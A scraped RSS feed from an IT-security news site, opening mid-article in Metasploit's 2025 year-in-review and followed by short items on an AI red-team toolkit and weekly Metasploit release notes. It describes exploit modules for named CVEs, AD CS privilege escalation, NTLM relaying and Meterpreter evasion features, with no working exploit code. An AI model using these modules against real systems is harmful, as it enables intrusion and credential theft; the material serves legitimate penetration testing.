characteristics.</p><p>The sheer scope of this effort can't be overstated. Breaking the work into manageable chunks, h00die systematically converted modules from the old post-exploitation style to proper exploit modules with the new persistence mixin, handling everything from cron jobs and SSH keys to Windows registry modifications and service installations. The standardization means that all persistence modules now share common behaviors, produce cleanup scripts in a consistent format, and integrate cleanly with the rest of the framework. It's the kind of unglamorous but essential work that improves the entire framework's usability and maintainability, and we're grateful to h00die for taking on such an ambitious project and seeing it through.</p><h2>AD CS Vulnerable Certificate Template Detection and Exploitation Additions</h2><p>This year, Metasploit expanded its Active Directory Certificate Services (AD CS) coverage by adding detection and exploitation support for certificate templates vulnerable to ESC9, ESC10, and ESC16. Checks for these misconfigured certificate templates were integrated into the existing ldap_esc_vulnerable_template module, allowing users to easily identify misconfigured templates during assessments.</p><p>To complement this detection capability, we introduced the new esc_update_ldap_object module, which enables reliable exploitation of these vulnerable templates to escalate privileges. ESC9, ESC10, and ESC16 share a common pattern: each requires control of a user account with write privileges over another user that is permitted to enroll in the vulnerable template. While exploiting these techniques with other tools typically involves multiple manual and error-prone steps, the new module streamlines the entire workflow. Users configure the required datastore options, run the module, and receive a certificate that can be used to escalate privileges within the domain.</p><p>As part of this effort, we also introduced the ldap_object_attribute module, which provides standard CRUD operations for manipulating LDAP objects in Active Directory. This module — along with existing functionality such as shadow_credentials and get_ticket — is used internally by esc_update_ldap_object to abstract away low-level LDAP interactions and simplify exploitation.</p><p>This work included comprehensive documentation covering the configuration of templates vulnerable to ESC9, ESC10, and ESC16, as well as detailed instructions for exploiting each technique using the new module.</p><h3>Active Directory Improvements</h3><p>Related to our AD CS improvements, came new low-level functionality for interacting with Active Directory (AD) Domain Controllers over LDAP. Over the past couple of years, Metasploit has seen multiple modules added that facilitate AD attack workflows including <a href="https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/admin/ldap/shadow_credentials.md">Shadow Credentials</a>, <a href="https://docs.metasploit.com/docs/pentesting/active-directory/kerberos/rbcd.html">RBCD</a>, <a href="https://docs.metasploit.com/docs/pentesting/active-directory/kerberos/unconstrained_delegation.html">Unconstrained Delegation</a>, etc. Like the AD CS attacks, many of these techniques are reliant on access control to some degree. Over the summer, Metasploit introduced <a href="https://github.com/rapid7/metasploit-framework/pull/20345">new functionality</a> to facilitate checking for these types of attacks. This new library provides Active Directory specific functionality, most notably, the ability to remotely evaluate security descriptors to determine whether a particular user or group has a specific access right. This has already been incorporated into the following modules to either enable or improve the existing detection capabilities.</p><ul><li>auxiliary/admin/ldap/shadow_credentials</li><li>auxiliary/admin/ldap/rbcd</li><li>auxiliary/admin/ldap/ad_cs_cert_template</li><li>auxiliary/gather/ldap_esc_vulnerable_cert_finder</li></ul><p>For module authors, the library provides a composable API for determining if an object grants a particular permission to an optional SID. The SID can be either a user or group, and when omitted is automatically set to the authenticating user, i.e. to check if the current connection has the permissions.</p><p>For example, check if the object grants the read and write property permissions with:</p>adds_obj_grants_permissions?(@ldap, obj, SecurityDescriptorMatcher::Allow.all(%i[RP WP]))<br><h2>Code Cleanup At Scale</h2><p>Beyond new features and modules, 2025 also saw substantial code quality improvements thanks to community contributor bcoles, who took on the often-thankless task of resolving RuboCop violations across the codebase. Throughout the year, bcoles systematically worked through older modules, cleaning up style inconsistencies, fixing syntax violations, and converting outdated property types to proper boolean values in auxiliary scanners and exploit modules. This kind of incremental maintenance work—fixing redundant parentheses here, resolving style violations there—doesn't make for flashy headlines, but it keeps the codebase maintainable and makes life easier for everyone working in the framework. Code quality matters, and we're grateful to bcoles for putting in the work to keep Metasploit's technical debt in check.</p><h2>Payload Improvements</h2><p>It may be a fun fact, or perhaps tribal knowledge that an “exploit” to Metasploit is a module that delivers a payload. All the great exploit content this year would be nothing without corresponding payloads to deliver and we make sure that those get plenty of our time as well. The following changes in particular are highly impactful and may have gone unnoticed while the flashier exploits received all the attention.</p><h3>Windows Meterpreter Improvements</h3><p>The biggest updates for the Windows Meterpreter revolve around two major improvements: the first is the upgrade to ReflectiveDLLInjection, made by Alex (xaitax) Hagenah, for which we express our gratitude for improving this area of the Metasploit Framework that requires a high level of attention to detail. This update introduces full, production-ready ARM64 support and a comprehensive architectural modernization of the whole library. These changes open the door to future support for a native ARM64 Meterpreter on Windows. Additionally, Metasploit split the standard API extension for Windows this year. This was actually the design used in the original Meterpreter implementation and we’ve reconsidered the monolithic approach. This improvement is one of the multiple steps we have in the pipeline to improve the evasion capabilities for our Windows Meterpreter. The standard API library now allows the user to load only specific subcomponents of the extension (for example, the component for network or file-system interaction), reducing the memory footprint for memory scanners. To leverage this new functionality, set AutoLoadStdapi to False, and then load one or more extensions manually, e.g. load stdapi_fs. To maintain backwards compatibility, a single stdapi extension is also still available and can be loaded with load stdapi.</p><h3>Fetch Payload Improvements</h3><p>The first milestone was the introduction of fileless execution for Linux fetch payloads, enabling payloads to run directly from memory using anonymous files. This advancement greatly enhances operational stealth by minimizing forensic traces and avoiding file-based detection, with careful attention to safe, opt-in behavior and collaborative code refinement. Following this, the FETCH_PIPE option streamlined payload deployment into a single, compact command. This improvement enhanced both usability and evasion, while also supporting larger, more complex command payloads (such as fileless execution) to be executed even with reduced command size. Additionally, fetch payload support has expanded to seven additional CPU architectures: aarch64, armbe, armle, mipsbe, mipsle, ppc, and ppc64le. This significantly broadens Metasploit's reach across embedded and legacy systems. Both features are thoroughly tested and future-proof, making the framework more versatile and powerful.</p><h3>New Architectures Basic Support</h3><p>This year, we have also updated the framework to support new basic payloads. We have introduced the exec payload for Windows ARM64 (provided by Alex (xaitax) Hagenah), reverse shell for RISC-V 32 and 64 bit, and Loongarch64 (both provided by bcoles).</p><h3>COMING SOON</h3><p>As much as we try, everything doesn’t always fit into one year. With that in mind, we wanted to highlight some upcoming features that we’re particularly excited to complete in the coming months.</p><h4>Malleable C2</h4><p>The malleable c2 will allow the user to specify with a .profile scribing how the HTTP requests between meterpreter and metasploit-framework should look like, allowing metasploit to hide the distinctive traffic generated by the session communication.</p><h4>Direct Syscall in Metsrv</h4><p>We have updated the Meterpreter core (metsrv) to remove common static signatures, such as specific strings and function imports, making it harder to detect.</p><h4>PoolParty for 32-bit systems</h4><p>Additional work to port the poolparty injection on native 32 bit system, Huge thanks to xHector1337 for taking over the research and extension of the code injection for the new architecture.</p><h2>SCCM Modules</h2><p>This year, Metasploit added two modules for targeting SCCM instances and recovering the Network Access Account credentials. These modules differ in how they perform the authentication. The first, auxiliary/admin/sccm/get_naa_credentials accepts credentials from the operator and will use them to authenticate and run the attack on demand. This pairs nicely with the auxiliary/admin/dcerpc/samr_account module when the operator can create a new machine account. However, when that’s not an option, Metasploit still has you covered with the auxiliary/server/relay/relay_get_naa_credentials variant that enables relaying NTLM authentication from an SMB server. These attack workflows were demonstrated at Black Hat and DEF CON over the summer and we anticipate they’ll remain useful in the future.</p><h2>Module Highlights</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20713">CVE-2025-9316, CVE-2025-11700 N-able N-Central XXE</a> – N-able N-Central is a popular Remote Monitoring and Management (RMM) platform. These two vulnerabilities, when combined, enable Metasploit to read local files without authenticating. This can be used to obtain a number of sensitive backup files from the application itself, or anything else on the host system. XXE attacks are a less common vulnerability, at least in Metasploit-land but this is a fantastic example of how impactful they can be.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20112">CVE-2025-22457 Ivanti Connect Secure Unauthenticated RCE</a> – Ivanti RCEs are always valuable and this module shows that memory corruption lives on in 2025. Not only is this exploit unauthenticated and reliable, it is a great example of how ROP chains can be used.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/19897">CVE-2024-55555 Invoice Ninja RCE</a> – This particular module leverages a PHP deserialization vulnerability within the application. While this vulnerability requires knowledge of the APP_KEY, successful exploitation could have significant financial implications. As an added bonus, this module came with a new library adding support for Laravel Framework-specific cryptography methods.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/19950">CVE-2024-55556 InvoiceShelf RCE</a> – Everyone loves a good pairing, and this module continues h00die-gr3y’s work on invoicing software, showing that they’re useful for receiving more than just payments.</li><li>LDAP Password Disclosure – This module has been around for a while, but received some new features in 2025 for targeting Active Directory Domain Controllers. The <a href="https://github.com/rapid7/metasploit-framework/pull/20017">first</a> added support for LAPSv1 and v2, enabling the module to recover the local admin account on systems. Later in the year, a <a href="https://github.com/rapid7/metasploit-framework/pull/20401">second</a> improvement added support for gMSA accounts. This module also pairs nicely with the new <a href="https://github.com/rapid7/metasploit-framework/pull/19832">SMB to LDAP NTLM Relay</a> module we added this year as well.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20409">Microsoft SharePoint ToolPane Unauthenticated RCE (CVE-2025-53770 and CVE-2025-53771)</a></li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20060">Exploit module for CVE-2025-32433 (Erlang/OTP)</a></li></ul><h3>SMB Relay Expansion</h3><p>This year, Metasploit significantly leveled up its relaying capabilities, transforming the framework’s only SMB to SMB relay capability into a powerful engine for lateral movement. Traditionally, SMB relaying was often the domain of standalone external tools, but through the dedicated work of the Metasploit team, these workflows are now seamlessly integrated into the framework</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/19832">SMB to LDAP relay module</a></li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20637">SMB to MSSQL NTLM Relay module</a></li></ul><h2><span>Community Stats Recap</span></h2><p>A huge thank you from the entire Metasploit team to all 66 contributors in 2025. Your contributions and ideas are what continue to improve this tool every year. Notably, 41 of these were first-time contributors who added new code.</p><p>Here are some stats for 2025:</p><ul><li>Number of new modules: 139</li><li>Number of new bug fixes: 133</li><li>Number of new enhancements: 115</li><li>Number of new documentations: 19</li><li>Number of new payload enhancements: 18</li></ul><p>Contributors in 2025 (ordered by count)</p><ul><li>bcoles</li><li>h00die</li><li>Chocapikk</li><li>h00die-gr3y</li><li>Takahiro-Yoko</li><li>h4x-x0r</li><li>smashery</li><li>vognik (new in 2025)</li><li>jvoisin</li><li>xHector1337 (new in 2025)</li><li>jmartin-tech</li><li>mariomontecatine (new in 2025)</li><li>blue0x1 (new in 2025)</li><li>nakkouchtarek (new in 2025)</li><li>molecula2788</li><li>xaitax</li><li>happybear-21 (new in 2025)</li><li>e2002e</li><li>fabpiaf (new in 2025)</li><li>mekhalleh</li><li>JohannesLks (new in 2025)</li><li>BitTheByte (new in 2025)</li><li>todb</li><li>00nx (new in 2025)</li><li>DevBuiHieu (new in 2025)</li><li>SweilemCodes (new in 2025)</li><li>arpitjain099 (new in 2025)</li><li>L-codes</li><li>Zeecka (new in 2025)</li><li>aaryan-11-x</li><li>whotwagner</li><li>lafried (new in 2025)</li><li>sebaspf (new in 2025)</li><li>hantwister (new in 2025)</li><li>tastyrce (new in 2025)</li><li>easymoney322 (new in 2025)</li><li>gardnerapp</li><li>TheBigStonk (new in 2025)</li><li>0xAryan (new in 2025)</li><li>sempervictus</li><li>szymonj99</li><li>Mathiou04</li><li>vultza (new in 2025)</li><li>enty8080 (new in 2025)</li><li>SaiSakthidar (new in 2025)</li><li>Zedeldi (new in 2025)</li><li>stfnw (new in 2025)</li><li>mmacfadden (new in 2025)</li><li>daffainfo (new in 2025)</li><li>HamzaSahin61 (new in 2025)</li><li>survivant (new in 2025)</li><li>uhei</li><li>EchoSl0w (new in 2025)</li><li>jeffmcjunkin</li><li>BenoitDePaoli (new in 2025)</li><li>randomstr1ng</li><li>2tunnels (new in 2025)</li><li>rodolphopivetta (new in 2025)</li><li>RakRakGaming (new in 2025)</li><li>Desiree05 (new in 2025)</li><li>Wopseeion (new in 2025)</li><li>jphamgithub (new in 2025)</li><li>H4k1l (new in 2025)</li><li>fishBone000 (new in 2025)</li><li>xl4635 (new in 2025)</li></ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[GHOSTCREW: AI-Powered Red Team Toolkit Integrating Metasploit, Nmap, and More]]></title>
<description><![CDATA[A new open-source tool is bridging the gap between artificial intelligence and offensive security operations.  GHOSTCREW is an advanced AI red team assistant that leverages Large Language Models (LLMs), Model Context Protocol (MCP), and Retrieval-Augmented Generation (RAG) to automate complex pen...]]></description>
<link>https://tsecurity.de/de/3195078/it-security-nachrichten/ghostcrew-ai-powered-red-team-toolkit-integrating-metasploit-nmap-and-more/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3195078/it-security-nachrichten/ghostcrew-ai-powered-red-team-toolkit-integrating-metasploit-nmap-and-more/</guid>
<pubDate>Mon, 05 Jan 2026 15:12:18 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A new open-source tool is bridging the gap between artificial intelligence and offensive security operations.  GHOSTCREW is an advanced AI red team assistant that leverages Large Language Models (LLMs), Model Context Protocol (MCP), and Retrieval-Augmented Generation (RAG) to automate complex penetration…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/ghostcrew-ai-powered-red-team-toolkit-integrating-metasploit-nmap-and-more/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/ghostcrew-ai-powered-red-team-toolkit-integrating-metasploit-nmap-and-more/">GHOSTCREW: AI-Powered Red Team Toolkit Integrating Metasploit, Nmap, and More</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[IT Security News Hourly Summary 2026-01-05 15h : 7 posts]]></title>
<description><![CDATA[7 posts were published in the last hour 14:4 : GHOSTCREW: AI-Powered Red Team Toolkit Integrating Metasploit, Nmap, and More 14:4 : ProfileHound: Post-Escalation Tool Designed to Achieve Red Team Objectives 14:4 : Kimwolf Botnet Exploits 2 Million Devices to…
Read more →
The post IT Security News...]]></description>
<link>https://tsecurity.de/de/3195076/it-security-nachrichten/it-security-news-hourly-summary-2026-01-05-15h-7-posts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3195076/it-security-nachrichten/it-security-news-hourly-summary-2026-01-05-15h-7-posts/</guid>
<pubDate>Mon, 05 Jan 2026 15:12:01 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>7 posts were published in the last hour 14:4 : GHOSTCREW: AI-Powered Red Team Toolkit Integrating Metasploit, Nmap, and More 14:4 : ProfileHound: Post-Escalation Tool Designed to Achieve Red Team Objectives 14:4 : Kimwolf Botnet Exploits 2 Million Devices to…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-01-05-15h-7-posts/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-01-05-15h-7-posts/">IT Security News Hourly Summary 2026-01-05 15h : 7 posts</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[GHOSTCREW – AI-based Red Team Toolkit for Penetration Testing Invoking Metasploit, Nmap and Other Tools]]></title>
<description><![CDATA[GHOSTCREW emerges as a game-changing open-source toolkit for red teamers and penetration testers. This AI-powered assistant leverages large language models, integrates the MCP protocol, and supports the optional RAG architecture to orchestrate security tools via natural-language prompts.​ Develop...]]></description>
<link>https://tsecurity.de/de/3194421/it-security-nachrichten/ghostcrew-ai-based-red-team-toolkit-for-penetration-testing-invoking-metasploit-nmap-and-other-tools/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3194421/it-security-nachrichten/ghostcrew-ai-based-red-team-toolkit-for-penetration-testing-invoking-metasploit-nmap-and-other-tools/</guid>
<pubDate>Mon, 05 Jan 2026 09:36:24 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>GHOSTCREW emerges as a game-changing open-source toolkit for red teamers and penetration testers. This AI-powered assistant leverages large language models, integrates the MCP protocol, and supports the optional RAG architecture to orchestrate security tools via natural-language prompts.​ Developed by GH05TCREW, the project has garnered over 450 stars on GitHub, signaling strong interest in the infosec […]</p>
<p>The post <a href="https://cybersecuritynews.com/ghostcrew-red-team-toolkit/">GHOSTCREW – AI-based Red Team Toolkit for Penetration Testing Invoking Metasploit, Nmap and Other Tools</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[GHOSTCREW – AI-based Red Team Toolkit for Penetration Testing Invoking Metasploit, Nmap and Other Tools]]></title>
<description><![CDATA[GHOSTCREW emerges as a game-changing open-source toolkit for red teamers and penetration testers. This AI-powered assistant leverages large language models, integrates the MCP protocol, and supports the optional RAG architecture to orchestrate security tools via natural-language prompts.​ Develop...]]></description>
<link>https://tsecurity.de/de/3194411/it-security-nachrichten/ghostcrew-ai-based-red-team-toolkit-for-penetration-testing-invoking-metasploit-nmap-and-other-tools/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3194411/it-security-nachrichten/ghostcrew-ai-based-red-team-toolkit-for-penetration-testing-invoking-metasploit-nmap-and-other-tools/</guid>
<pubDate>Mon, 05 Jan 2026 09:36:03 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>GHOSTCREW emerges as a game-changing open-source toolkit for red teamers and penetration testers. This AI-powered assistant leverages large language models, integrates the MCP protocol, and supports the optional RAG architecture to orchestrate security tools via natural-language prompts.​ Developed by GH05TCREW,…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/ghostcrew-ai-based-red-team-toolkit-for-penetration-testing-invoking-metasploit-nmap-and-other-tools/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/ghostcrew-ai-based-red-team-toolkit-for-penetration-testing-invoking-metasploit-nmap-and-other-tools/">GHOSTCREW – AI-based Red Team Toolkit for Penetration Testing Invoking Metasploit, Nmap and Other Tools</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Bundesregierung: Nutzung von Datenbrokern ist Staatsgeheimnis - Golem.de]]></title>
<description><![CDATA[Exklusiv: IT-Security Komplettpaket: Ethical Hacking & Metasploit (7 E-Learning ... Die Linke-Fraktion fragte konkret nach den Anbietern Datarade, ...]]></description>
<link>https://tsecurity.de/de/3174943/it-security-nachrichten/bundesregierung-nutzung-von-datenbrokern-ist-staatsgeheimnis-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3174943/it-security-nachrichten/bundesregierung-nutzung-von-datenbrokern-ist-staatsgeheimnis-golemde/</guid>
<pubDate>Mon, 22 Dec 2025 23:35:44 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Exklusiv: <b>IT</b>-<b>Security</b> Komplettpaket: Ethical Hacking &amp; Metasploit (7 E-Learning ... Die Linke-Fraktion fragte konkret nach den Anbietern Datarade, ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Wrap-Up 12/19/2025]]></title>
<description><![CDATA[React2Shell Payload ImprovementsLast week Metasploit released an exploit for the React2Shell vulnerability, and this week we have made a couple of improvements to the payloads that it uses. The first improvement affects all Metasploit modules. When an exploit is used, an initial payload is select...]]></description>
<link>https://tsecurity.de/de/3170357/it-security-nachrichten/metasploit-wrap-up-12192025/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3170357/it-security-nachrichten/metasploit-wrap-up-12192025/</guid>
<pubDate>Fri, 19 Dec 2025 22:36:16 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>React2Shell Payload Improvements</h2><p>Last week Metasploit released an exploit for the React2Shell vulnerability, and this week we have made a couple of improvements to the payloads that it uses. The first improvement affects all Metasploit modules. When an exploit is used, an initial payload is selected using some basic logic that effectively would make a selection from the first available in alphabetical order. Now Metasploit will prefer a default of x86 Meterpreters for Windows systems (since 32-bit payloads work on both 32-bit and 64-bit versions of Windows) and x64 Meterpreters for all other platforms including Linux. In the context of React2Shell, this means the payload now defaults to x64 for Linux instead of AARCH64.</p><p>Another improvement that only affects this exploit was the change of the default payload to one leveraging Node.js which is more likely to be present than the wget binary that was required. These defaults should hopefully help users get started with this high-impact exploit with more ease, but of course any compatible payload can still be selected.</p><p>Stay tuned for the Metasploit annual wrap-up and roadmap announcement coming up!</p><h2>New module content (2)</h2><h3>N-able N-Central Authentication Bypass and XXE Scanner</h3><p>Authors: Valentin Lobstein <a href="mailto:chocapikk@leakix.net">chocapikk@leakix.net</a> and Zach Hanley (Horizon3.ai) </p><p>Type: Auxiliary </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20713">#20713</a> contributed by <a href="https://github.com/Chocapikk">Chocapikk</a> </p><p>Path: <span data-type="inlineCode">scanner/http/nable_ncentral_auth_bypass_xxe</span></p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-11700&amp;referrer=blog">CVE-2025-11700</a></p><p>Description: This adds an auxiliary module that exploits two CVEs affecting N-able N-Central. CVE-2025-9316, an Unauthenticated Session Bypass and CVE-2025-11700 a XXE (XML External Entity) vulnerability. The module combines both vulnerabilities to achieve unauthenticated file read on affected N-Central instances (versions &lt; 2025.4.0.9).</p><h3>Grav CMS Twig SSTI Authenticated Sandbox Bypass RCE</h3><p>Author: Tarek Nakkouch </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20749">#20749</a> contributed by <a href="https://github.com/nakkouchtarek">nakkouchtarek</a> </p><p>Path: <span data-type="inlineCode">multi/http/grav_twig_ssti_sandbox_bypass_rce</span></p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-66301&amp;referrer=blog">CVE-2025-66301</a></p><p>Description: This adds an exploit module for a Server-Side Template Injection (SSTI) vulnerability (CVE-2025-66294) in Grav CMS, versions prior to 1.8.0-beta.27 , that allows bypassing the Twig sandbox to achieve remote code execution. To inject the malicious payload into a form's process section, this module leverages CVE-2025-66301, a broken access control flaw in the /admin/pages/{page_name} endpoint.</p><h2>Enhancements and features (2)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20424">#20424</a> from <a href="https://github.com/cdelafuente-r7">cdelafuente-r7</a> - Updates how vulnerabilities and services are reported by adding a resource field to both models. It also add a parents field to make layered services possible. An optional resource field can now be provided and the existing service field has been updated to also accept an option hash.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20771">#20771</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - Updates Metasploit's default payload selection logic to preference x86 payloads over AARCH64 payloads.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20773">#20773</a> from <a href="https://github.com/jheysel-r7">jheysel-r7</a> - This updates the exploit for React2Shell with a better default payload.</li></ul><p></p><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222025-12-10T17%3A05%3A19Z..2025-12-17T23%3A32%3A14Z%22">Pull Requests 6.4.102...6.4.103</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.102...6.4.103">Full diff 6.4.102...6.4.103</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft: Bereits die Einrichtung von Windows 11 lässt uns verzweifeln - Golem.de]]></title>
<description><![CDATA[E-Learning: Exklusiv: IT-Security Komplettpaket: Ethical Hacking & Metasploit (7 E-Learning Kurse im Paket) · zum Kurs. Kurz danach landen wir bereits ...]]></description>
<link>https://tsecurity.de/de/3162953/it-security-nachrichten/microsoft-bereits-die-einrichtung-von-windows-11-laesst-uns-verzweifeln-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3162953/it-security-nachrichten/microsoft-bereits-die-einrichtung-von-windows-11-laesst-uns-verzweifeln-golemde/</guid>
<pubDate>Tue, 16 Dec 2025 18:50:46 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[E-Learning: Exklusiv: <b>IT</b>-<b>Security</b> Komplettpaket: Ethical Hacking &amp; Metasploit (7 E-Learning Kurse im Paket) · zum Kurs. Kurz danach landen wir bereits ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Wrap-Up 12/12/2025]]></title>
<description><![CDATA[React2shell ModuleAs you may have heard, on December 3, 2025, the React team announced a critical Remote Code Execution (RCE) vulnerability in servers using the React Server Components (RSC) Flight protocol. The vulnerability, tracked as CVE-2025-55182, carries a CVSS score of 10.0 and is informa...]]></description>
<link>https://tsecurity.de/de/3156261/it-security-nachrichten/metasploit-wrap-up-12122025/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3156261/it-security-nachrichten/metasploit-wrap-up-12122025/</guid>
<pubDate>Fri, 12 Dec 2025 22:20:58 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>React2shell Module</h2><p>As you may have heard, on December 3, 2025, the React team announced a critical Remote Code Execution (RCE) vulnerability in servers using the React Server Components (RSC) Flight protocol. The vulnerability, tracked as <a href="https://attackerkb.com/assessments/0a808ee6-5df2-443a-a634-813dc0946305">CVE-2025-55182</a>, carries a CVSS score of 10.0 and is informally known as "React2Shell". It allows attackers to achieve prototype pollution during deserialization of RSC payloads by sending specially crafted multipart requests with "proto", "constructor", or "prototype" as module names. We're happy to announce that community contributor <a href="https://github.com/vognik">vognik</a> submitted an exploit module for React2Shell which landed earlier this week and is included in this week's release.</p><h2>MSSQL Improvements</h2><p>Over the past couple of weeks Metasploit has made a couple of key improvements to the framework’s MSSQL attack capabilities. The first (<a href="https://github.com/rapid7/metasploit-framework/pull/20637">PR 20637</a>) is a new NTLM relay module, <span data-type="inlineCode">auxiliary/server/relay/smb_to_mssql</span>, which enables users to start a malicious SMB server that will relay authentication attempts to one or more target MSSQL servers. When successful, the Metasploit operator will have an interactive session to the MSSQL server that can be used to run interactive queries, or MSSQL auxiliary modules.</p><p>Building on this work, it became clear that users would need to interact with MSSQL servers that required encryption as many do in hardened environments. To achieve that objective, <a href="https://github.com/rapid7/metasploit-framework/issues/18745">issue 18745</a> was closed by updating Metasploits MSSQL protocol library to offer better encryption support. Now, Metasploit users can open interactive sessions to servers that offer and even require encrypted connections. This functionality is available automatically in the <span data-type="inlineCode">auxiliary/scanner/mssql/mssql_login </span>and new <span data-type="inlineCode">auxiliary/server/relay/smb_to_mssql </span>modules.</p><h2>New module content (5)</h2><h3>Magento SessionReaper</h3><p>Authors: Blaklis, Tomais Williamson, and Valentin Lobstein <a href="mailto:chocapikk@leakix.net">chocapikk@leakix.net</a> </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20725">#20725</a> contributed by <a href="https://github.com/Chocapikk">Chocapikk</a> </p><p>Path:<span data-type="inlineCode">multi/http/magento_sessionreaper</span></p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-54236&amp;referrer=blog">CVE-2025-54236</a></p><p>Description: This adds a new exploit module for CVE-2025-54236 (SessionReaper), a critical vulnerability in Magento/Adobe Commerce that allows unauthenticated remote code execution. The vulnerability stems from improper handling of nested deserialization in the payment method context, combined with an unauthenticated file upload endpoint.</p><h3>Unauthenticated RCE in React and Next.js</h3><p>Authors: Lachlan Davidson, Maksim Rogov, and maple3142 </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20760">#20760</a> contributed by <a href="https://github.com/sfewer-r7">sfewer-r7</a> </p><p>Path: <span data-type="inlineCode">multi/http/react2shell_unauth_rce_cve_2025_55182</span> </p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-66478&amp;referrer=blog">CVE-2025-66478</a></p><p>Description: This adds an exploit for CVE-2025-55182 which is an unauthenticated RCE in React. This vulnerability has been referred to as React2Shell.</p><h3>WordPress King Addons for Elementor Unauthenticated Privilege Escalation to RCE</h3><p>Authors: Peter Thaleikis and Valentin Lobstein <a href="mailto:chocapikk@leakix.net">chocapikk@leakix.net</a> </p><p>Type: Exploit </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20746">#20746</a> contributed by <a href="https://github.com/Chocapikk">Chocapikk</a> </p><p>Path: <span data-type="inlineCode">multi/http/wp_king_addons_privilege_escalation</span> </p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-8489&amp;referrer=blog">CVE-2025-8489</a></p><p>Description: This adds an exploit module for CVE-2025-8489, an unauthenticated privilege escalation vulnerability in the WordPress King Addons for Elementor plugin (versions 24.12.92 to 51.1.14). The vulnerability allows unauthenticated attackers to create administrator accounts by specifying the user_role parameter during registration, enabling remote code execution through plugin upload.</p><h3>Linux Reboot</h3><p>Author: bcoles <a href="mailto:bcoles@gmail.com">bcoles@gmail.com</a> </p><p>Type: Payload (Single) </p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20682">#20682</a> contributed by <a href="https://github.com/bcoles">bcoles</a> </p><p>Path:<span data-type="inlineCode">linux/loongarch64/reboot</span></p><p>Description: This extends our payloads support to a new architecture, 